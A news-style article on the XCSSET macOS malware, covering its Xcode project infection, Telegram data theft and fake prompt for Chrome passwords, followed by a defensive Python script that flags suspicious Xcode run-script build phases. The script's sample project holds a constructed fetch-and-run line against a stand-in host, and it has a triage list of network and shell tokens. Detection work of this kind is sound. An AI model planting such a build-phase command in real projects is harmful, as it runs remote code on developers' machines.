XCSSET, classified as an ongoing malware campaign by Trend Micro, targets macOS users' information by infecting Xcode projects. The most recent campaign has been spotted targeting Google Chrome and Telegram installations through AppleScript. A report by Trend Micro explains that because not all apps run sandboxed on macOS, any user can read many of the installed applications' data directories. By copying the data from the Telegram installation to another system, it is possible to access the victim's Telegram account. XCSSET also targets saved passwords in Google Chrome, though that is not quite as easy. Google Chrome protects saved credentials with a "safe_storage_key", which requires root permissions to read. To get around this, the malware author created a fake security dialog prompting the victim to grant it permission. Once the victim accepts, the passwords are decrypted and sent to a command and control (C2) server.
Fortunately for most Mac users, a development environment such as Xcode is not a necessity and may not be installed. When looking for new applications, Mac users should stick to the App Store when possible. Like many storefronts, the App Store is curated and Apple vets applications through its own security screening process. Not all apps can be found on the App Store, however, so users should exercise caution when installing apps from third-party sources and only continue if they trust the site or source of the download. Developers using Xcode should also exercise caution when opening new projects from unfamiliar sources, as there could be untrusted code set to run during the build phase of the project.
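One concrete way to act on that last point before building an unfamiliar project, added here as example code (not from Trend Micro's report or any real project): list every run-script build phase in a project.pbxproj and decode its script so it can be read by hand. The project fragment and the triage token list are constructed for this example.

```python
import re

# Constructed fragment of an Xcode project.pbxproj, not taken from any real project.
SAMPLE_PBXPROJ = r'''
		AA01 = {
			isa = PBXSourcesBuildPhase;
		};
		AA02 /* Lint */ = {
			isa = PBXShellScriptBuildPhase;
			name = "Lint";
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
		AA03 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "curl -s \"https://example.invalid/stage\" | sh\n";
		};
'''

# One top-level object: ID, optional /* comment */, body up to its closing "};" (non-greedy; script phases have no nested braces).
OBJECT_RE = re.compile(r'^\s*([0-9A-Fa-f]+)(?:\s*/\*\s*(.*?)\s*\*/)?\s*=\s*\{\n(.*?)\n\s*\};', re.M | re.S)
ISA_RE = re.compile(r'isa\s*=\s*PBXShellScriptBuildPhase\s*;')
NAME_RE = re.compile(r'^\s*name\s*=\s*"?([^";\n]*?)"?\s*;', re.M)
# pbxproj strings are double-quoted with backslash escapes (\" \\ \n \t).
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', re.S)
# Constructed triage tokens: a hit is a reason to read the script, not proof of malice.
SUSPICIOUS = ("curl", "wget", "base64", "osascript", "| sh", "| bash")

def unescape(s: str) -> str:
    return re.sub(r'\\(.)', lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)

def extract_script_phases(pbxproj: str) -> list:
    """Return every run-script build phase with its decoded script and matched triage tokens."""
    phases = []
    for m in OBJECT_RE.finditer(pbxproj):
        ident, comment, body = m.group(1), m.group(2), m.group(3)
        if not ISA_RE.search(body):
            continue  # not a PBXShellScriptBuildPhase object
        script_m = SCRIPT_RE.search(body)
        script = unescape(script_m.group(1)) if script_m else ""
        name_m = NAME_RE.search(body)
        phases.append({"id": ident, "name": name_m.group(1) if name_m else (comment or ""),
                       "script": script, "suspicious": [t for t in SUSPICIOUS if t in script]})
    return phases

if __name__ == "__main__":
    for p in extract_script_phases(SAMPLE_PBXPROJ):
        print("REVIEW" if p["suspicious"] else "ok", p["id"], repr(p["script"]))
```

Point `extract_script_phases` at the text of a real `project.pbxproj` to review a downloaded project's build-phase scripts before opening it in Xcode.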